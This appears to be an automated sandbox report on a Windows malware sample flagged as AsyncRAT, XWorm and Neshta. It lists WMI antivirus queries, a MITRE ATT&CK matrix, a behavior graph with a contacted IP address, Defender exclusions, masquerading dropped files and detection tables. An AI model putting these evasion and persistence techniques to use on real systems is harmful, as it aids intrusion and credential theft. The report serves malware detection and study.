                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Yara detected AsyncRAT
                              Source: Yara matchFile source: x.exe, type: SAMPLE
                              Source: Yara matchFile source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 5336, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED
                              Source: x.exe, 00000002.00000002.2466469178.000000000131D000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2478454246.000000001CAE5000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2476117462.000000001BFA6000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2466469178.00000000012C3000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2476117462.000000001C001000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected Neshta
                              Source: Yara matchFile source: 00000000.00000002.1905892392.0000000000409000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 1292, type: MEMORYSTR
                              Yara detected XWorm
                              Source: Yara matchFile source: x.exe, type: SAMPLE
                              Source: Yara matchFile source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.2471076189.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 5336, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Yara detected XWorm
                              Source: Yara matchFile source: x.exe, type: SAMPLE
                              Source: Yara matchFile source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.2471076189.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 5336, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                              Windows Management Instrumentation                              		1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		21
                              Disable or Modify Tools                              		111
                              Input Capture                              		2
                              File and Directory Discovery                              		1
                              Taint Shared Content                              		11
                              Archive Collected Data                              		1
                              Ingress Tool Transfer                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Scheduled Task/Job                              		1
                              Windows Service                              		1
                              Windows Service                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory23
                              System Information Discovery                              		Remote Desktop Protocol111
                              Input Capture                              		1
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              PowerShell                              		1
                              Scheduled Task/Job                              		12
                              Process Injection                              		11
                              Obfuscated Files or Information                              		Security Account Manager541
                              Security Software Discovery                              		SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Standard Port                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron12
                              Registry Run Keys / Startup Folder                              		1
                              Scheduled Task/Job                              		2
                              Software Packing                              		NTDS2
                              Process Discovery                              		Distributed Component Object ModelInput Capture2
                              Non-Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                              Registry Run Keys / Startup Folder                              		1
                              DLL Side-Loading                              		LSA Secrets151
                              Virtualization/Sandbox Evasion                              		SSHKeylogging12
                              Application Layer Protocol                              		Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts321
                              Masquerading                              		Cached Domain Credentials1
                              Application Window Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                              Virtualization/Sandbox Evasion                              		DCSync1
                              System Network Configuration Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                              Process Injection                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465840 Sample: x.exe Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 64 ip-api.com 2->64 78 Found malware configuration 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 Antivirus detection for dropped file 2->82 84 20 other signatures 2->84 10 x.exe 4 2->10         started        signatures3 process4 file5 54 C:\Windows\svchost.com, PE32 10->54 dropped 56 C:\Users\user\AppData\Local\Temp\chrome.exe, PE32 10->56 dropped 58 C:\Users\user\AppData\Local\Temp\...\x.exe, PE32 10->58 dropped 60 111 other malicious files 10->60 dropped 94 Creates an undocumented autostart registry key 10->94 96 Drops PE files with a suspicious file extension 10->96 98 Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS) 10->98 100 2 other signatures 10->100 14 x.exe 20 6 10->14         started        signatures6 process7 dnsIp8 66 ip-api.com 208.95.112.1, 49699, 80 TUT-ASUS United States 14->66 68 45.141.26.232, 49705, 49706, 49707 SPECTRAIPSpectraIPBVNL Netherlands 14->68 62 C:\...\Java Update Checker (64 bit).exe, PE32 14->62 dropped 70 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->70 72 Protects its processes via BreakOnTermination flag 14->72 74 Drops executables to the windows directory (C:\Windows) and starts them 14->74 76 3 other signatures 14->76 19 svchost.com 2 14->19         started        23 svchost.com 14->23         started        25 svchost.com 14->25         started        27 svchost.com 14->27         started        file9 signatures10 process11 file12 46 C:\Program Files (x86)\...\Uninstall.exe, PE32 19->46 dropped 48 C:\...\MicrosoftEdgeUpdateCore.exe, PE32 19->48 dropped 50 C:\...\MicrosoftEdgeUpdateBroker.exe, PE32 19->50 dropped 52 48 other malicious files 19->52 dropped 86 Bypasses PowerShell execution policy 19->86 88 Adds a directory exclusion to Windows Defender 19->88 90 Sample is not signed and drops a device driver 19->90 92 Infects executable files (exe, dll, sys, html) 19->92 29 powershell.exe 19->29         started        32 powershell.exe 23->32         started        34 powershell.exe 25->34         started        36 powershell.exe 27->36         started        signatures13 process14 signatures15 102 Loading BitLocker PowerShell Module 29->102 38 conhost.exe 29->38         started        40 conhost.exe 32->40         started        42 conhost.exe 34->42         started        44 conhost.exe 36->44         started        process16

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              x.exe97%ReversingLabsWin32.Virus.Neshuta
                              x.exe93%VirustotalBrowse
                              x.exe100%AviraW32/Delf.I
                              x.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\AutoIt3\Uninstall.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE100%AviraW32/Delf.I
                              C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Delf.I
                              C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\AutoIt3\Uninstall.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE100%Joe Sandbox ML
                              C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\AutoIt3\Au3Check.exe97%ReversingLabsWin32.Virus.Neshuta
